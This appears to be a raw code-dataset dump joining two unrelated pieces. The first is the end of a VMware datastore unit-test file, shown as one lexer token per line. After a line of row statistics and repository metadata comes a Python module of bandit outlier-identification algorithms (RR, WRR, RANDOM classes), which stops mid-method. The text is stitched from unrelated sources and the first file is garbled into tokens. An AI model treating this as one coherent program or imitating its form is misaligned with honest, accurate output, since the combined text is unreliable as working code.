dedent|''
name|'except'
name|'exception'
op|'.'
name|'DatastoreNotFound'
name|'as'
name|'e'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'exp_message'
op|','
name|'e'
op|'.'
name|'args'
op|'['
number|'0'
op|']'
op|')'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'fail'
op|'('
string|'"DatastoreNotFound Exception was not raised with "'
nl|'\n'
string|'"message: %s"'
op|'%'
name|'exp_message'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_datastore_without_datastore
dedent|''
dedent|''
name|'def'
name|'test_get_datastore_without_datastore'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'DatastoreNotFound'
op|','
nl|'\n'
name|'ds_util'
op|'.'
name|'get_datastore'
op|','
nl|'\n'
name|'fake'
op|'.'
name|'FakeObjectRetrievalSession'
op|'('
name|'None'
op|')'
op|','
name|'cluster'
op|'='
string|'"fake-cluster"'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_datastore_inaccessible_ds
dedent|''
name|'def'
name|'test_get_datastore_inaccessible_ds'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'data_store'
op|'='
name|'fake'
op|'.'
name|'Datastore'
op|'('
op|')'
newline|'\n'
name|'data_store'
op|'.'
name|'set'
op|'('
string|'"summary.accessible"'
op|','
name|'False'
op|')'
newline|'\n'
nl|'\n'
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'data_store'
op|')'
newline|'\n'
nl|'\n'
name|'with'
name|'self'
op|'.'
name|'_mock_get_datastore_calls'
op|'('
name|'fake_objects'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'DatastoreNotFound'
op|','
nl|'\n'
name|'ds_util'
op|'.'
name|'get_datastore'
op|','
nl|'\n'
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-cluster'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_datastore_ds_in_maintenance
dedent|''
dedent|''
name|'def'
name|'test_get_datastore_ds_in_maintenance'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'data_store'
op|'='
name|'fake'
op|'.'
name|'Datastore'
op|'('
op|')'
newline|'\n'
name|'data_store'
op|'.'
name|'set'
op|'('
string|'"summary.maintenanceMode"'
op|','
string|'"inMaintenance"'
op|')'
newline|'\n'
nl|'\n'
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'data_store'
op|')'
newline|'\n'
nl|'\n'
name|'with'
name|'self'
op|'.'
name|'_mock_get_datastore_calls'
op|'('
name|'fake_objects'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'DatastoreNotFound'
op|','
nl|'\n'
name|'ds_util'
op|'.'
name|'get_datastore'
op|','
nl|'\n'
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-cluster'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_datastore_no_host_in_cluster
dedent|''
dedent|''
name|'def'
name|'test_get_datastore_no_host_in_cluster'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
string|"''"
newline|'\n'
nl|'\n'
dedent|''
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'DatastoreNotFound'
op|','
nl|'\n'
name|'ds_util'
op|'.'
name|'get_datastore'
op|','
nl|'\n'
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-cluster'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|_test_is_datastore_valid
dedent|''
dedent|''
name|'def'
name|'_test_is_datastore_valid'
op|'('
name|'self'
op|','
name|'accessible'
op|'='
name|'True'
op|','
nl|'\n'
name|'maintenance_mode'
op|'='
string|'"normal"'
op|','
nl|'\n'
name|'type'
op|'='
string|'"VMFS"'
op|','
nl|'\n'
name|'datastore_regex'
op|'='
name|'None'
op|','
nl|'\n'
name|'ds_types'
op|'='
name|'ds_util'
op|'.'
name|'ALL_SUPPORTED_DS_TYPES'
op|')'
op|':'
newline|'\n'
indent|' '
name|'propdict'
op|'='
op|'{'
op|'}'
newline|'\n'
name|'propdict'
op|'['
string|'"summary.accessible"'
op|']'
op|'='
name|'accessible'
newline|'\n'
name|'propdict'
op|'['
string|'"summary.maintenanceMode"'
op|']'
op|'='
name|'maintenance_mode'
newline|'\n'
name|'propdict'
op|'['
string|'"summary.type"'
op|']'
op|'='
name|'type'
newline|'\n'
name|'propdict'
op|'['
string|'"summary.name"'
op|']'
op|'='
string|'"ds-1"'
newline|'\n'
nl|'\n'
name|'return'
name|'ds_util'
op|'.'
name|'_is_datastore_valid'
op|'('
name|'propdict'
op|','
name|'datastore_regex'
op|','
name|'ds_types'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_is_datastore_valid
dedent|''
name|'def'
name|'test_is_datastore_valid'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'for'
name|'ds_type'
name|'in'
name|'ds_util'
op|'.'
name|'ALL_SUPPORTED_DS_TYPES'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'self'
op|'.'
name|'_test_is_datastore_valid'
op|'('
name|'True'
op|','
nl|'\n'
string|'"normal"'
op|','
nl|'\n'
name|'ds_type'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_is_datastore_valid_inaccessible_ds
dedent|''
dedent|''
name|'def'
name|'test_is_datastore_valid_inaccessible_ds'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'self'
op|'.'
name|'_test_is_datastore_valid'
op|'('
name|'False'
op|','
nl|'\n'
string|'"normal"'
op|','
nl|'\n'
string|'"VMFS"'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_is_datastore_valid_ds_in_maintenance
dedent|''
name|'def'
name|'test_is_datastore_valid_ds_in_maintenance'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'self'
op|'.'
name|'_test_is_datastore_valid'
op|'('
name|'True'
op|','
nl|'\n'
string|'"inMaintenance"'
op|','
nl|'\n'
string|'"VMFS"'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_is_datastore_valid_ds_type_invalid
dedent|''
name|'def'
name|'test_is_datastore_valid_ds_type_invalid'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'self'
op|'.'
name|'_test_is_datastore_valid'
op|'('
name|'True'
op|','
nl|'\n'
string|'"normal"'
op|','
nl|'\n'
string|'"vfat"'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_is_datastore_valid_not_matching_regex
dedent|''
name|'def'
name|'test_is_datastore_valid_not_matching_regex'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'datastore_regex'
op|'='
name|'re'
op|'.'
name|'compile'
op|'('
string|'"ds-2"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'self'
op|'.'
name|'_test_is_datastore_valid'
op|'('
name|'True'
op|','
nl|'\n'
string|'"normal"'
op|','
nl|'\n'
string|'"VMFS"'
op|','
nl|'\n'
name|'datastore_regex'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_is_datastore_valid_matching_regex
dedent|''
name|'def'
name|'test_is_datastore_valid_matching_regex'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'datastore_regex'
op|'='
name|'re'
op|'.'
name|'compile'
op|'('
string|'"ds-1"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'self'
op|'.'
name|'_test_is_datastore_valid'
op|'('
name|'True'
op|','
nl|'\n'
string|'"normal"'
op|','
nl|'\n'
string|'"VMFS"'
op|','
nl|'\n'
name|'datastore_regex'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_connected_hosts_none
dedent|''
name|'def'
name|'test_get_connected_hosts_none'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
string|"'_call_method'"
op|')'
name|'as'
name|'_call_method'
op|':'
newline|'\n'
indent|' '
name|'hosts'
op|'='
name|'ds_util'
op|'.'
name|'get_connected_hosts'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
string|"'fake_datastore'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
op|']'
op|','
name|'hosts'
op|')'
newline|'\n'
name|'_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'ANY'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
string|"'fake_datastore'"
op|','
string|"'host'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_connected_hosts
dedent|''
dedent|''
name|'def'
name|'test_get_connected_hosts'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'host'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
name|'spec'
op|'='
name|'object'
op|')'
newline|'\n'
name|'host'
op|'.'
name|'value'
op|'='
string|"'fake-host'"
newline|'\n'
name|'host_mount'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
name|'spec'
op|'='
name|'object'
op|')'
newline|'\n'
name|'host_mount'
op|'.'
name|'key'
op|'='
name|'host'
newline|'\n'
name|'host_mounts'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
name|'spec'
op|'='
name|'object'
op|')'
newline|'\n'
name|'host_mounts'
op|'.'
name|'DatastoreHostMount'
op|'='
op|'['
name|'host_mount'
op|']'
newline|'\n'
nl|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
name|'host_mounts'
op|')'
name|'as'
name|'_call_method'
op|':'
newline|'\n'
indent|' '
name|'hosts'
op|'='
name|'ds_util'
op|'.'
name|'get_connected_hosts'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
string|"'fake_datastore'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
string|"'fake-host'"
op|']'
op|','
name|'hosts'
op|')'
newline|'\n'
name|'_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'ANY'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
string|"'fake_datastore'"
op|','
string|"'host'"
op|')'
newline|'\n'
dedent|''
dedent|''
dedent|''
endmarker|''
end_unit
| 12.69904 | 88 | 0.603357 | 6,632 | 44,980 | 3.97301 | 0.05187 | 0.16031 | 0.092603 | 0.053285 | 0.876959 | 0.833011 | 0.805458 | 0.753008 | 0.71164 | 0.679532 | 0 | 0.001985 | 0.104135 | 44,980 | 3,541 | 89 | 12.702626 | 0.651901 | 0 | 0 | 0.943519 | 0 | 0 | 0.378235 | 0.043931 | 0 | 0 | 0 | 0 | 0.016097 | 0 | null | null | 0.000565 | 0.002542 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
28a0d0e0140daaed4e0010baf05909b3e0163a59 | 45,892 | py | Python | ROAI_class.py | yinglunz/ROAI_ICML2020 | 827ca6f6279c93d8a35871c286a2b76a86afae7c | [
"MIT"
] | 1 | 2021-10-01T17:43:42.000Z | 2021-10-01T17:43:42.000Z | ROAI_class.py | yinglunz/ROAI_ICML2020 | 827ca6f6279c93d8a35871c286a2b76a86afae7c | [
"MIT"
] | null | null | null | ROAI_class.py | yinglunz/ROAI_ICML2020 | 827ca6f6279c93d8a35871c286a2b76a86afae7c | [
"MIT"
] | null | null | null | import numpy as np
import math
def get_reward(instance, arm, sigma, instance_type):
    """Draw one stochastic reward for ``arm``.

    For a ``'bernoulli'`` instance the arm pays 1 with probability
    ``instance[arm]`` and 0 otherwise; for any other instance type the
    reward is Gaussian with mean ``instance[arm]`` and std ``sigma``.
    """
    if instance_type == 'bernoulli':
        return 1 if np.random.random() < instance[arm] else 0
    return np.random.normal(instance[arm], sigma)
class RR:
    """Round-Robin (RR) baseline for bandit outlier identification.

    Arms are pulled cyclically.  After every pull the empirical outlier
    threshold ``mean(rewards) + k * std(rewards)`` is recomputed together
    with anytime confidence bounds, and arms whose outlier status is
    resolved are dropped from ``active_set``.

    Fix relative to the original implementation: ``update`` no longer
    removes arms from ``active_set`` while iterating over it (which used
    to skip the element following each removal); the set is rebuilt.
    """

    def __init__(self, instance, mean, std, k, sigma, delta, tol):
        self.instance = instance
        self.n = len(instance)
        n = self.n
        self.mean = mean
        self.std = std
        # this k denotes the original one (multiplier on the std in the
        # outlier threshold mean + k * std)
        self.k = k
        self.threshold_true = self.mean + self.k * self.std
        self.outlier_set_true = []
        self.instance_type = 'bernoulli'
        self.sigma = sigma
        self.delta = delta
        self.tol = tol
        self.t = 0                      # total number of pulls so far
        self.active_set = []            # arms whose status is unresolved
        self.wins = np.zeros(n)
        self.pulls = np.zeros(n)
        # rewards here represents the empirical mean of each arm
        self.rewards = np.zeros(n)
        self.ucbs = np.ones(n)
        self.lcbs = np.zeros(n)
        self.index_pull = 0             # next arm in the round-robin order
        self.threshold_spec = 0
        self.outlier_set_spec = []
        self.outlier_set_spec_sub = []
        self.outlier_set_spec_sup = []
        self.threshold_at = 0           # anytime estimate of the threshold
        self.threshold_lcb = 0
        self.threshold_ucb = 1
        self.outlier_set_at = []

    def compute_ci_hoeffding(self, arm):
        """Anytime Hoeffding confidence radius for one arm.

        Note that the union bound needs a (n+1) term rather than a (n)
        term here.
        """
        log_term = math.log((np.pi**2 * (self.n+1) * (self.pulls[arm] ** 2)) / (3 * self.delta))
        return math.sqrt(log_term / (2 * self.pulls[arm]))

    def compute_ci_threshold(self):
        """Confidence radius for the empirical threshold mean + k * std.

        The width scales with ``l_k`` (set in :meth:`initialization`) and
        with the harmonic mean of the pull counts.
        """
        log_term = math.log(((math.pi ** 2) * self.n * (self.t ** 2)) / (3 * self.delta))
        sum_inverse = sum(1 / self.pulls[arm] for arm in range(self.n))
        harmonic_mean = self.n / sum_inverse
        return math.sqrt((log_term * self.l_k) / (2 * harmonic_mean))

    def initialization(self):
        """Compute the target outlier sets and pull each arm once."""
        g_k = ((1 + (self.k * math.sqrt(self.n - 1))) ** 2) / self.n
        self.l_k = (np.sqrt(g_k) + np.sqrt(self.k**2/(2* np.log((np.pi**2 * self.n**3)/(6*self.delta)))))**2
        # compute true set of outliers (spec = method-specific threshold on
        # the given instance; sub/sup are the tolerance-shrunk/-grown sets)
        self.threshold_spec = np.mean(self.instance) + self.k * np.std(self.instance)
        for arm in range(self.n):
            if self.instance[arm] > self.threshold_spec - self.tol:
                self.outlier_set_spec_sup.append(arm)
            if self.instance[arm] > self.threshold_spec:
                self.outlier_set_spec.append(arm)
            if self.instance[arm] > self.threshold_spec + self.tol:
                self.outlier_set_spec_sub.append(arm)
            if self.instance[arm] > self.threshold_true:
                self.outlier_set_true.append(arm)
        # pull each arm once
        for arm in range(self.n):
            rwd = get_reward(self.instance, arm, self.sigma, self.instance_type)
            self.t += 1
            self.wins[arm] += rwd
            self.pulls[arm] += 1
            self.rewards[arm] = self.wins[arm] / self.pulls[arm]
            beta_tilde = self.compute_ci_hoeffding(arm)
            self.ucbs[arm] = self.rewards[arm] + beta_tilde
            self.lcbs[arm] = self.rewards[arm] - beta_tilde
        beta_tilde_threshold = self.compute_ci_threshold()
        self.threshold_at = np.mean(self.rewards) + self.k * np.std(self.rewards)
        self.threshold_ucb = self.threshold_at + beta_tilde_threshold
        self.threshold_lcb = self.threshold_at - beta_tilde_threshold
        self.outlier_set_at = []
        for arm in range(self.n):
            if self.rewards[arm] > self.threshold_at:
                self.outlier_set_at.append(arm)
            # an arm is active while its interval still overlaps the
            # threshold's confidence interval
            if (self.rewards[arm] > self.threshold_at and self.lcbs[arm] < self.threshold_ucb) or \
                    (self.rewards[arm] <= self.threshold_at and self.ucbs[arm] > self.threshold_lcb):
                self.active_set.append(arm)

    def update(self):
        """Pull the next arm in round-robin order and refresh all state."""
        arm = self.index_pull
        rwd = get_reward(self.instance, arm, self.sigma, self.instance_type)
        self.t += 1
        self.wins[arm] += rwd
        self.pulls[arm] += 1
        self.rewards[arm] = self.wins[arm] / self.pulls[arm]
        beta_tilde = self.compute_ci_hoeffding(arm)
        self.ucbs[arm] = self.rewards[arm] + beta_tilde
        self.lcbs[arm] = self.rewards[arm] - beta_tilde
        beta_tilde_threshold = self.compute_ci_threshold()
        self.threshold_at = np.mean(self.rewards) + self.k * np.std(self.rewards)
        self.threshold_ucb = self.threshold_at + beta_tilde_threshold
        self.threshold_lcb = self.threshold_at - beta_tilde_threshold
        self.outlier_set_at = []
        for i in range(self.n):
            if self.rewards[i] > self.threshold_at:
                self.outlier_set_at.append(i)
        # Rebuild the active set instead of calling list.remove while
        # iterating over the same list (the original skipped the element
        # following each removal).
        still_active = []
        for a in self.active_set:
            resolved = (self.rewards[a] > self.threshold_at and self.threshold_ucb <= self.lcbs[a]) or \
                (self.rewards[a] <= self.threshold_at and self.ucbs[a] <= self.threshold_lcb)
            if not resolved:
                still_active.append(a)
        self.active_set = still_active
        self.index_pull = (self.index_pull + 1) % self.n

    def compute_error(self):
        """Return three 0/1 error flags for the current anytime decision.

        Returns (error_general, error_spec_tol, error_spec): mismatch with
        the true outlier set, with the tolerance-relaxed spec sets, and
        with the exact spec set, respectively (0 = correct).
        """
        error_spec_tol = 1
        error_spec = 1
        if (set(self.outlier_set_at).issubset(set(self.outlier_set_spec_sup))) and \
                (set(self.outlier_set_spec_sub).issubset(set(self.outlier_set_at))):
            error_spec_tol = 0
        if self.outlier_set_at == self.outlier_set_spec:
            error_spec = 0
        error_general = 1
        if self.outlier_set_at == self.outlier_set_true:
            error_general = 0
        return error_general, error_spec_tol, error_spec
class WRR:
    """Weighted Round-Robin (WRR) baseline for bandit outlier identification.

    Like :class:`RR`, but each regular pass raises a per-arm pull quota
    (``threshold_pulls``) by ``rho``; additional pulls may then be spent
    on a chosen arm via :meth:`update_additional`.

    Fixes relative to the original implementation:
    * ``__init__`` initialized ``threshold_lub`` (a typo); it is now
      ``threshold_lcb``, the name the rest of the class reads;
    * the threshold bounds are stored consistently as ``threshold_ucb`` /
      ``threshold_lcb``.  ``update_additional`` previously wrote
      ``ucb_threshold``/``lcb_threshold`` but its prune check compared
      against the stale ``threshold_ucb``/``threshold_lcb``;
    * ``initialization``'s active-arm condition compared ``ucbs[arm]``
      against the threshold *upper* bound; it now compares against the
      lower bound, mirroring RR's condition;
    * arms are no longer removed from ``active_set`` while iterating over
      it, which used to skip elements.
    """

    def __init__(self, instance, mean, std, k, sigma, delta, tol):
        self.instance = instance
        n = len(instance)
        self.n = n
        self.mean = mean
        self.std = std
        self.k = k
        self.threshold_true = self.mean + self.k * self.std
        self.outlier_set_true = []
        self.instance_type = 'bernoulli'
        self.sigma = sigma
        self.delta = delta
        self.tol = tol
        self.t = 0
        self.active_set = []
        self.l_k = 0
        self.rho = 0
        self.wins = np.zeros(n)
        self.pulls = np.ones(n)
        self.rewards = np.zeros(n)
        self.ucbs = np.ones(n)
        self.lcbs = np.zeros(n)
        self.threshold_spec = 0
        self.outlier_set_spec = []
        self.outlier_set_spec_sub = []
        self.outlier_set_spec_sup = []
        # at = anytime
        self.threshold_at = 0
        self.threshold_lcb = 0      # original had the typo "threshold_lub"
        self.threshold_ucb = 1
        self.outlier_set_at = []
        self.s_active_len = n
        self.index_pull = 0
        # in certain iteration of WRR, pulls on a certain arm need to exceed
        # the threshold pull before pulling other arms
        self.threshold_pulls = np.zeros(n)

    def compute_ci_hoeffding(self, arm):
        """Anytime Hoeffding confidence radius for one arm.

        Note that the union bound needs a (n+1) term rather than a (n)
        term here.
        """
        log_term = math.log((np.pi**2 * (self.n+1) * (self.pulls[arm] ** 2)) / (3 * self.delta))
        return math.sqrt(log_term / (2 * self.pulls[arm]))

    def compute_ci_threshold(self):
        """Confidence radius for the empirical threshold mean + k * std."""
        log_term = math.log(((math.pi ** 2) * self.n * (self.t ** 2)) / (3 * self.delta))
        sum_inverse = sum(1 / self.pulls[arm] for arm in range(self.n))
        harmonic_mean = self.n / sum_inverse
        return math.sqrt((log_term * self.l_k) / (2 * harmonic_mean))

    def compute_rho(self):
        """Per-round increment of the pull quota, ((n-1)^2 / l_k)^(1/3)."""
        return (((self.n - 1) ** 2) / self.l_k) ** (1 / 3)

    def _record_pull(self, arm):
        """Pull ``arm`` once and refresh its mean and confidence interval."""
        rwd = get_reward(self.instance, arm, self.sigma, self.instance_type)
        self.t += 1
        self.wins[arm] += rwd
        self.pulls[arm] += 1
        self.rewards[arm] = self.wins[arm] / self.pulls[arm]
        beta_tilde = self.compute_ci_hoeffding(arm)
        self.ucbs[arm] = self.rewards[arm] + beta_tilde
        self.lcbs[arm] = self.rewards[arm] - beta_tilde

    def _refresh_threshold_and_active(self):
        """Recompute threshold bounds and the anytime outlier set, then
        prune arms whose outlier status is now resolved."""
        beta_tilde_threshold = self.compute_ci_threshold()
        self.threshold_at = np.mean(self.rewards) + self.k * np.std(self.rewards)
        self.threshold_ucb = self.threshold_at + beta_tilde_threshold
        self.threshold_lcb = self.threshold_at - beta_tilde_threshold
        self.outlier_set_at = [i for i in range(self.n) if self.rewards[i] > self.threshold_at]
        # Rebuild the active set instead of calling list.remove while
        # iterating over the same list (the original skipped the element
        # following each removal).
        remaining = []
        for a in self.active_set:
            resolved = (self.rewards[a] > self.threshold_at and self.threshold_ucb <= self.lcbs[a]) or \
                (self.rewards[a] <= self.threshold_at and self.ucbs[a] <= self.threshold_lcb)
            if not resolved:
                remaining.append(a)
        self.active_set = remaining
        self.s_active_len = len(self.active_set)

    def initialization(self):
        """Compute the target outlier sets and pull each arm once."""
        g_k = ((1 + (self.k * math.sqrt(self.n - 1))) ** 2) / self.n
        self.l_k = (np.sqrt(g_k) + np.sqrt(self.k**2/(2* np.log((np.pi**2 * self.n**3)/(6*self.delta)))))**2
        self.rho = self.compute_rho()
        self.threshold_spec = np.mean(self.instance) + self.k * np.std(self.instance)
        for arm in range(self.n):
            if self.instance[arm] > self.threshold_spec - self.tol:
                self.outlier_set_spec_sup.append(arm)
            if self.instance[arm] > self.threshold_spec:
                self.outlier_set_spec.append(arm)
            if self.instance[arm] > self.threshold_spec + self.tol:
                self.outlier_set_spec_sub.append(arm)
            if self.instance[arm] > self.threshold_true:
                self.outlier_set_true.append(arm)
        # pull each arm once
        for arm in range(self.n):
            self._record_pull(arm)
        beta_tilde_threshold = self.compute_ci_threshold()
        self.threshold_at = np.mean(self.rewards) + self.k * np.std(self.rewards)
        self.threshold_ucb = self.threshold_at + beta_tilde_threshold
        self.threshold_lcb = self.threshold_at - beta_tilde_threshold
        self.outlier_set_at = []
        for arm in range(self.n):
            if self.rewards[arm] > self.threshold_at:
                self.outlier_set_at.append(arm)
            # an arm is active while its interval still overlaps the
            # threshold's confidence interval (mirrors RR; the original
            # compared ucbs[arm] against the upper bound here)
            if (self.rewards[arm] > self.threshold_at and self.lcbs[arm] < self.threshold_ucb) or \
                    (self.rewards[arm] <= self.threshold_at and self.ucbs[arm] > self.threshold_lcb):
                self.active_set.append(arm)
        self.s_active_len = len(self.active_set)

    def update_regular(self):
        """One round-robin pull; raises the pulled arm's quota by rho."""
        arm = self.index_pull
        self.threshold_pulls[arm] += self.rho
        self._record_pull(arm)
        self._refresh_threshold_and_active()
        self.index_pull = (self.index_pull + 1) % self.n

    def update_additional(self, arm):
        """One extra (non-round-robin) pull on ``arm``."""
        self._record_pull(arm)
        self._refresh_threshold_and_active()

    def compute_error(self):
        """Return three 0/1 error flags for the current anytime decision.

        Returns (error_general, error_spec_tol, error_spec): mismatch with
        the true outlier set, with the tolerance-relaxed spec sets, and
        with the exact spec set, respectively (0 = correct).
        """
        error_spec_tol = 1
        error_spec = 1
        if (set(self.outlier_set_at).issubset(set(self.outlier_set_spec_sup))) and \
                (set(self.outlier_set_spec_sub).issubset(set(self.outlier_set_at))):
            error_spec_tol = 0
        if self.outlier_set_at == self.outlier_set_spec:
            error_spec = 0
        error_general = 1
        if self.outlier_set_at == self.outlier_set_true:
            error_general = 0
        return error_general, error_spec_tol, error_spec

    def get_results(self):
        """Return (empirical outlier set, total pulls, threshold).

        NOTE(review): ``self.threshold`` is only created by
        ``output_outlier_set``; calling this first raises AttributeError —
        presumably callers always call ``output_outlier_set`` before this.
        """
        empirical_outlier_set = []
        for arm in range(self.n):
            if self.rewards[arm] > self.threshold:
                empirical_outlier_set.append(arm)
        return empirical_outlier_set, self.t, self.threshold

    def output_outlier_set(self):
        """Recompute the final threshold and return the arms above it."""
        self.threshold = np.mean(self.rewards) + self.k * np.std(self.rewards)
        empirical_outlier_set = []
        for arm in range(self.n):
            if self.rewards[arm] > self.threshold:
                empirical_outlier_set.append(arm)
        return empirical_outlier_set
class RANDOM:
def __init__(self, instance, n_select, mean, std, k, instance_type, sigma, delta, tol):
self.n = len(instance)
n = self.n
self.instance = instance
self.n_select = n_select
self.mean = mean
self.std = std
self.k_original = k
self.threshold_true = self.mean + self.k_original * self.std
self.outlier_set_true = []
self.k = 1.4826 * self.k_original
# k_original denotes the original k
# while k denotes the adjusted one for MAD
self.instance_type = instance_type
self.sigma = sigma
self.delta = delta
self.tol = tol
self.t = 0
self.wins = np.zeros(n)
self.pulls = np.zeros(n)
self.rewards = np.zeros(n)
self.ucbs = np.ones(n)
self.lcbs = np.zeros(n)
self.sample_candidate = list(range(n))
# s: set; u: upper; m: median; l: lower
# MAD: median absolute deviation
self.index_select = []
self.cluster_boundary_spec = []
# cluster boundary store boundaries for the selected index
# everything below are primarily designed for the selected index
# we will use spec to denote method specific values
self.s_u_spec = []
self.s_m_spec = []
self.s_l_spec = []
self.median_spec = 0
# AD = absolute deviation
self.AD_spec = np.zeros(n)
self.s_MAD_spec = []
self.MAD_spec = 0
self.threshold_spec = 0
self.outlier_set_spec = []
self.outlier_set_spec_sub = []
self.outlier_set_spec_sup = []
# at = anytime
# anytime here refers to anytime decision of the set
self.s_u_at = []
self.s_m_at = []
self.s_l_at = []
self.median_at = 0
self.AD_at = np.zeros(n)
self.s_MAD_at = []
self.MAD_at = 0
self.threshold_at = 0
# s_median_ucb store arms contribute to the ucb of median
self.s_median_ucb = []
self.median_ucb = 1
self.s_median_lcb = []
self.median_lcb = 0
self.AD_ucbs = np.ones(n)
self.AD_lcbs = np.ones(n)
# s_MAD_ucb store arms contribute to the ucb of MAD
self.s_MAD_ucb = []
self.MAD_ucb = 1
self.s_MAD_lcb = []
self.MAD_lcb = 0
self.threshold_lcb = 0
self.threshold_ucb = 1
self.s_active = []
self.s_active_len = n
# store active arms
def compute_ci_hoeffding(self, arm):
beta = math.log((np.pi**2 * (self.n) * (self.pulls[arm] ** 2)) / (3 * self.delta))
return math.sqrt(beta / (2 * self.pulls[arm]))
def compute_ci_subgaussian(self, arm):
    """Return the sub-Gaussian confidence radius for `arm`.

    The radius is sigma * sqrt(2 * log(pi^2 * n * pulls^2 / (3 * delta)) / pulls).
    """
    pulls = self.pulls[arm]
    log_arg = (np.pi ** 2 * self.n * pulls ** 2) / (3 * self.delta)
    return self.sigma * math.sqrt(2 * math.log(log_arg) / pulls)
def update_internal(self):
    """Recompute median/MAD confidence bounds, the outlier-threshold interval,
    and the active arm set from the current per-arm UCB/LCB values.

    Only arms in ``self.index_select`` contribute to the median/MAD estimates;
    the resulting threshold is then compared against every arm.
    """
    [start, end] = self.cluster_boundary_spec
    # Median LCB/UCB: average of the middle-ranked lower/upper bounds over
    # the selected arms ([start, end) covers one or two middle positions).
    ranking_lcbs = np.argsort(self.lcbs[self.index_select])
    self.s_median_lcb = self.index_select[ranking_lcbs[start: end]]
    self.median_lcb = sum(self.lcbs[i] for i in self.s_median_lcb) / len(self.s_median_lcb)
    ranking_ucbs = np.argsort(self.ucbs[self.index_select])
    self.s_median_ucb = self.index_select[ranking_ucbs[start: end]]
    self.median_ucb = sum(self.ucbs[i] for i in self.s_median_ucb) / len(self.s_median_ucb)
    for i in self.index_select:
        # Confidence interval on each selected arm's absolute deviation (AD)
        # from the median, derived from the arm and median intervals.
